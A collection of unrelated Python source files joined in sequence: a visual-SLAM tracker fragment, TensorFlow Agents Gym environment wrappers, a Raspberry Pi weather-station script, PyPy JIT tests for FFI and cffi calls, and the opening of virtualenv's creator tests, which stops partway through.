print(weights)
self.net = DroidNet()
state_dict = OrderedDict([
(k.replace("module.", ""), v) for (k, v) in torch.load(weights).items()])
state_dict["update.weight.2.weight"] = state_dict["update.weight.2.weight"][:2]
state_dict["update.weight.2.bias"] = state_dict["update.weight.2.bias"][:2]
state_dict["update.delta.2.weight"] = state_dict["update.delta.2.weight"][:2]
state_dict["update.delta.2.bias"] = state_dict["update.delta.2.bias"][:2]
self.net.load_state_dict(state_dict)
self.net.to("cuda:0").eval()
def track(self, tstamp, image, depth=None, intrinsics=None):
""" main thread - update map """
with torch.no_grad():
# check there is enough motion
self.filterx.track(tstamp, image, depth, intrinsics)
# local bundle adjustment
self.frontend()
# global bundle adjustment
# self.backend()
def terminate(self, stream=None):
""" terminate the visualization process, return poses [t, q] """
del self.frontend
torch.cuda.empty_cache()
print("#" * 32)
self.backend(7)
torch.cuda.empty_cache()
print("#" * 32)
self.backend(12)
camera_trajectory = self.traj_filler(stream)
return camera_trajectory.inv().data.cpu().numpy()
|
wrappers.py | # Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
self._capacity = max(past_indices)
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (observ is not False and
self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (action is not False and
self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
return gym.spaces.Box(-np.inf * np.ones(shape), np.inf * np.ones(shape))
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor):
"""Step environment in a separate process for lock free paralellism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The reveived message is of an unknown type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.send((self._EXCEPTION, stacktrace))
conn.close()
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
|
main_processes.py | #!/usr/bin/env python
from multiprocessing import Manager, Process
from datetime import datetime
import time
import progressbar
import touchphat
from pilconvert import palette_convert
from tpf_60 import sensing
from plot_graphs import plot_graph
from inky_write import show_image
from stat_calc import calc_statistics
from speak_information import speak_info, speak_full_info
@touchphat.on_touch("A")
def handle_a():
global speak_values
speak_values = True
@touchphat.on_touch("B")
def handle_b():
global speak_all_values
speak_all_values = True
class Weather:
def __init__(self, image_file=None, screen_polling_time=60, sleep_time=1, data_polling_time=1, data_limit=60, data_timeout=None):
manager = Manager()
self.temperature_data = manager.list()
self.pressure_data = manager.list()
self.humidity_data = manager.list()
self.temperature_statistics = manager.dict()
self.pressure_statistics = manager.dict()
self.humidity_statistics = manager.dict()
self.calculate_condition = manager.Condition()
self.image_file = image_file
self.data_polling = data_polling_time
self.data_timeout = data_timeout
self.data_limit = data_limit
if screen_polling_time < 20:
raise ValueError("Polling time cannot be less 20s, the refresh rate of the screen.")
if data_polling_time > screen_polling_time:
raise ValueError("Data must be polled at least once per screen refresh.")
if screen_polling_time/data_polling_time > 60:
UserWarning("Data will show the last {} seconds, but only be polled every {} seconds.".format(data_polling_time * 60, screen_polling_time))
if screen_polling_time/data_polling_time > 180:
raise ValueError("Too much data will be lost in between screen refreshes (120+ data points).")
self.polling_time = screen_polling_time
if sleep_time > 60:
UserWarning("Sleeping longer than 60s will mean that the screen updates less than once per minute.")
self.sleep_time = sleep_time
def run(self):
global speak_values
global speak_all_values
sensor = Process(target=sensing, args=(self.temperature_data, self.pressure_data, self.humidity_data, self.data_polling, self.data_limit, self.data_timeout, self.calculate_condition), daemon=True)
sensor.start()
calc_stat = Process(target=calc_statistics, kwargs=dict(temperature_data=self.temperature_data,
temperature_statistics=self.temperature_statistics,
pressure_data=self.pressure_data,
pressure_statistics=self.pressure_statistics,
humidity_data=self.humidity_data,
humidity_statistics=self.humidity_statistics,
condition_flag=self.calculate_condition), daemon=True)
calc_stat.start()
time_mark = datetime.now()
bar = progressbar.ProgressBar(widgets=["Polling: ", progressbar.AnimatedMarker()], max_value=progressbar.UnknownLength)
while True:
if speak_values:
speak_values = False
spk_info = Process(target=speak_info, kwargs=dict(temperature_data=self.temperature_data,
pressure_data=self.pressure_data,
humidity_data=self.humidity_data), daemon=True)
spk_info.start()
elif speak_all_values:
speak_all_values = False
spk_all_info = Process(target=speak_full_info, kwargs=dict(temperature_data=self.temperature_data,
temperature_statistics=self.temperature_statistics,
pressure_data=self.pressure_data,
pressure_statistics=self.pressure_statistics,
humidity_data=self.humidity_data,
humidity_statistics=self.humidity_statistics,
data_polling=self.data_polling), daemon=True)
spk_all_info.start()
date_delta = datetime.now() - time_mark
if date_delta.total_seconds() >= self.polling_time:
bar.finish()
time_mark = datetime.now()
print(time_mark)
cur_info = "Latest: {0:.2f} F,{1:.2f} hPa,{2:.3f} %RH".format(self.temperature_data[-1],
self.pressure_data[-1],
self.humidity_data[-1])
print(cur_info)
plot_graph(self.temperature_data, self.pressure_data, self.humidity_data, self.image_file)
palette_convert(self.image_file)
inky_show = Process(target=show_image, args=(self.image_file, self.temperature_data,
self.pressure_data, self.humidity_data), daemon=True)
inky_show.start()
bar.start()
else:
bar.update(date_delta.total_seconds())
time.sleep(self.sleep_time)
if __name__ == "__main__":
speak_values = False
speak_all_values = False
while True:
try:
long_short = input("Short (1), long (2), or day-long (3) [default: 1]?")
if long_short == "1" or long_short == "":
dt_polling_time = 1
scr_polling_time = 60
dt_limit = 60
break
elif long_short == "2":
dt_polling_time = 60
scr_polling_time = 60
dt_limit = 60
elif long_short == "3":
dt_polling_time = 60
scr_polling_time = 60
dt_limit = 1440
break
else:
"Select 1, 2, or 3."
except KeyboardInterrupt:
pass
w = Weather(image_file="test.png", data_polling_time=dt_polling_time, screen_polling_time=scr_polling_time, sleep_time=1, data_limit=dt_limit)
w.run()
|
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, b'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == b'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in range(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p999 = getfield_gc_r(p125, descr=...)
guard_isnull(p999, descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, 0, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i159 = int_lt(i158, 0)
guard_false(i159, descr=...)
jump(..., descr=...)
""")
|
test_creator.py | from __future__ import absolute_import, unicode_literals
import difflib
import gc
import json
import logging
import os
import shutil
import stat
import subprocess
import sys
import zipfile
from collections import OrderedDict
from itertools import product
from stat import S_IREAD, S_IRGRP, S_IROTH
from textwrap import dedent
from threading import Thread
import pytest
from virtualenv.__main__ import run, run_with_catch
from virtualenv.create.creator import DEBUG_SCRIPT, Creator, get_env_debug_info
from virtualenv.create.via_global_ref.builtin.cpython.cpython2 import CPython2PosixBase
from virtualenv.create.via_global_ref.builtin.cpython.cpython3 import CPython3Posix
from virtualenv.create.via_global_ref.builtin.python2.python2 import Python2
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.info import IS_PYPY, IS_WIN, PY2, PY3, fs_is_case_sensitive
from virtualenv.pyenv_cfg import PyEnvCfg
from virtualenv.run import cli_run, session_via_cli
from virtualenv.util.path import Path
from virtualenv.util.six import ensure_str, ensure_text
CURRENT = PythonInfo.current_system()
def test_os_path_sep_not_allowed(tmp_path, capsys):
target = str(tmp_path / "a{}b".format(os.pathsep))
err = _non_success_exit_code(capsys, target)
msg = (
"destination {!r} must not contain the path separator ({}) as this"
" would break the activation scripts".format(target, os.pathsep)
)
assert msg in err, err
def _non_success_exit_code(capsys, target):
with pytest.raises(SystemExit) as context:
run_with_catch(args=[target])
assert context.value.code != 0
out, err = capsys.readouterr()
assert not out, out
return err
def test_destination_exists_file(tmp_path, capsys):
target = tmp_path / "out"
target.write_text("")
err = _non_success_exit_code(capsys, str(target))
msg = "the destination {} already exists and is a file".format(str(target))
assert msg in err, err
@pytest.mark.skipif(sys.platform == "win32", reason="Windows only applies R/O to files")
def test_destination_not_write_able(tmp_path, capsys):
if hasattr(os, "geteuid"):
if os.geteuid() == 0:
pytest.skip("no way to check permission restriction when running under root")
target = tmp_path
prev_mod = target.stat().st_mode
target.chmod(S_IREAD | S_IRGRP | S_IROTH)
try:
err = _non_success_exit_code(capsys, str(target))
msg = "the destination . is not write-able at {}".format(str(target))
assert msg in err, err
finally:
target.chmod(prev_mod)
def cleanup_sys_path(paths):
from virtualenv.create.creator import HERE
paths = [p.resolve() for p in (Path(os.path.abspath(i)) for i in paths) if p.exists()]
to_remove = [Path(HERE)]
if os.environ.get(str("PYCHARM_HELPERS_DIR")):
to_remove.append(Path(os.environ[str("PYCHARM_HELPERS_DIR")]).parent)
to_remove.append(Path(os.path.expanduser("~")) / ".PyCharm")
